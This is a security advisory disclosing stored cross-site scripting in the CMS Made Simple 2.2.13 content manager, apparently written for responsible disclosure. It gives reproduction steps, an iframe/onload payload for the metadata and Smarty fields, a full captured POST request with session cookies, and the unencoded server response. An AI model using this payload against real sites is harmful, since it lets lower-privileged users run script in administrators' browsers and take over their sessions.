Summary:
Stored Cross-Site Scripting - CMS Made Simple 2.2.13
Detailed Description:
CMS Made Simple 2.2.13 - Cross-Site Scripting (XSS) Persistent (2 Instances)
# Summary:
• Title: CMS Made Simple 2.2.13 Cross Site Scripting (XSS) Stored (2 Instances)
• Date: 22/12/2019
• Author: Guram Javakhishvili
• Email: guramj@gmail.com, misheljava@gmail.com
• Software : CMS Made Simple 2.2.13
• Product Version: 2.2.13
• Vulnerability Type : Injection
• Vulnerability : Cross Site Scripting (XSS) Stored
# Description:
CMS Made Simple version 2.2.13 suffer from reflective and persistent (Stored)
cross site scripting and html injection vulnerabilities.
Insufficient validation of user input on the authenticated part of the CMS Made
Simple web application exposes the application to persistent cross site
scripting (XSS) vulnerabilities.
These vulnerabilities enable potentially dangerous input from the user to be
accepted by the application and then embedded back in the HTML response of the
page returned by the web server.
When the content being viewed, e.g. by an administrative user, the
JavaScript code will be executed in the browser.
# Steps to Reproduce:
The attacker needs the appropriate permissions but non-Admin (can be Editor or
Designer user roles) in order to create News, Content, Directory, Shortcuts,
etc.
It was noted that the add/edit content function was found to be vulnerable to a
Stored Cross Site Scripting (XSS) vulnerability.
Login as editor > click on 'Content' > click on 'Content Manager' > Add/Edit
Content> click on 'Logic' and insert XSS payloads into the Metadata and Smarty
fields and click submit.
- If you click on 'Preview' next tab, the XSS payload for Metadata will render
in the browser.
- Once submitted the content with XSS payload, now click on view (search
symbol) which will open new tab and the XSS payload for Smarty will render in
the new window tab.
When the content being viewed, e.g. by an administrative user, the JavaScript
code will be executed in the browser.
# URL:
http://localhost/cmsms-2.2.13/admin/moduleinterface.php
List of vulnerable parameters:
. metadata
. pagedata
XSS Vector:
"";"/><iframe/onload=alert('Metadata')>//
# HTTP POST request:
POST /cmsms-2.2.13/admin/moduleinterface.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101
Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/
Content-Type: multipart/form-data;
boundary=---------------------------133703138732410
Content-Length: 4193
Origin: http://localhost
Connection: close
Cookie:
6a048a268372a94a595fdec4fbda4134aa83a6e6=e5d7ffe9b2883f3ee16cbcab8b30cb7300acc36d%3A%3AeyJ1aWQiOjIsInVzZXJuYW1lIjoiZ3VyYW1qIiwiZWZmX3VpZCI6bnVsbCwiZWZmX3VzZXJuYW1lIjpudWxsLCJoYXNoIjoiJDJ5JDEwJFdaNzlUc1JiOTI2c2pLbmlndmFlcS5QdGVjRTdFdmg1S0FlNnFQNlBMbXJqSFdIQW92Lk5tIn0%3D;
__c=233d48d93b73772c983; CMSIC1a82b0c9a5=4c765t5v2p4prm6t8v940s15nc;
CMSSESSIDa9ac5a041c5c=ibso1e87pflpck00qt050vmoqj
Upgrade-Insecure-Requests: 1
-----------------------------133703138732410
Content-Disposition: form-data; name="mact"
CMSContentManager,m1_,admin_editcontent,0
-----------------------------133703138732410
Content-Disposition: form-data; name="__c"
233d48d93b73772c983
-----------------------------133703138732410
Content-Disposition: form-data; name="m1_content_id"
5
-----------------------------133703138732410
Content-Disposition: form-data; name="m1_active_tab"
-----------------------------133703138732410
Content-Disposition: form-data; name="m1_content_type"
content
-----------------------------133703138732410
Content-Disposition: form-data; name="title"
Content
-----------------------------133703138732410
Content-Disposition: form-data; name="content_en"
<p>test</p>
-----------------------------133703138732410
Content-Disposition: form-data; name="menutext"
Content
-----------------------------133703138732410
Content-Disposition: form-data; name="parent_id"
2
-----------------------------133703138732410
Content-Disposition: form-data; name="showinmenu"
0
-----------------------------133703138732410
Content-Disposition: form-data; name="showinmenu"
1
-----------------------------133703138732410
Content-Disposition: form-data; name="titleattribute"
test
-----------------------------133703138732410
Content-Disposition: form-data; name="accesskey"
-----------------------------133703138732410
Content-Disposition: form-data; name="tabindex"
-----------------------------133703138732410
Content-Disposition: form-data; name="target"
---
-----------------------------133703138732410
Content-Disposition: form-data; name="metadata"
"";"/><iframe/onload=alert('Metadata')>//
-----------------------------133703138732410
Content-Disposition: form-data; name="pagedata"
"";"/><iframe/onload=alert('Smarty')>//
-----------------------------133703138732410
Content-Disposition: form-data; name="design_id"
5
-----------------------------133703138732410
Content-Disposition: form-data; name="template_id"
5
-----------------------------133703138732410
Content-Disposition: form-data; name="alias"
error404
-----------------------------133703138732410
Content-Disposition: form-data; name="active"
0
-----------------------------133703138732410
Content-Disposition: form-data; name="active"
1
-----------------------------133703138732410
Content-Disposition: form-data; name="secure"
0
-----------------------------133703138732410
Content-Disposition: form-data; name="cachable"
0
-----------------------------133703138732410
Content-Disposition: form-data; name="cachable"
1
-----------------------------133703138732410
Content-Disposition: form-data; name="image"
\logo1.gif
-----------------------------133703138732410
Content-Disposition: form-data; name="thumbnail"
\thumb_logo1.gif
-----------------------------133703138732410
Content-Disposition: form-data; name="extra1"
-----------------------------133703138732410
Content-Disposition: form-data; name="extra2"
-----------------------------133703138732410
Content-Disposition: form-data; name="extra3"
-----------------------------133703138732410
Content-Disposition: form-data; name="wantschildren"
0
-----------------------------133703138732410
Content-Disposition: form-data; name="wantschildren"
1
-----------------------------133703138732410
Content-Disposition: form-data; name="searchable"
0
-----------------------------133703138732410
Content-Disposition: form-data; name="searchable"
1
-----------------------------133703138732410
Content-Disposition: form-data; name="disable_wysiwyg"
0
-----------------------------133703138732410
Content-Disposition: form-data; name="ownerid"
1
-----------------------------133703138732410
Content-Disposition: form-data; name="additional_editors"
-----------------------------133703138732410
Content-Disposition: form-data; name="additional_editors[]"
2
-----------------------------133703138732410
Content-Disposition: form-data; name="m1_submit"
Submit
-----------------------------133703138732410--
# Snip of HTTP Server response (output not encoded):
HTTP/1.1 200 OK
Date: Sat, 21 Dec 2019 19:01:47 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1c PHP/7.3.7
X-Powered-By: PHP/7.3.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 11148
"";"/><iframe/onload=alert('Smarty')>//<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML
1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>guram - Content</title>
<base href="http://localhost/cmsms-2.2.13/" />
<meta name="Generator" content="CMS Made Simple - Copyright (C) 2004-2019. All
rights reserved." />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
"";"/><iframe/onload=alert('Metadata')>//
<link rel="stylesheet" type="text/css"
href="http://localhost/cmsms-2.2.13/tmp/cache/stylesheet_combined_fc62991346a03890a7c4a79a94d4e411.css"
media="screen" />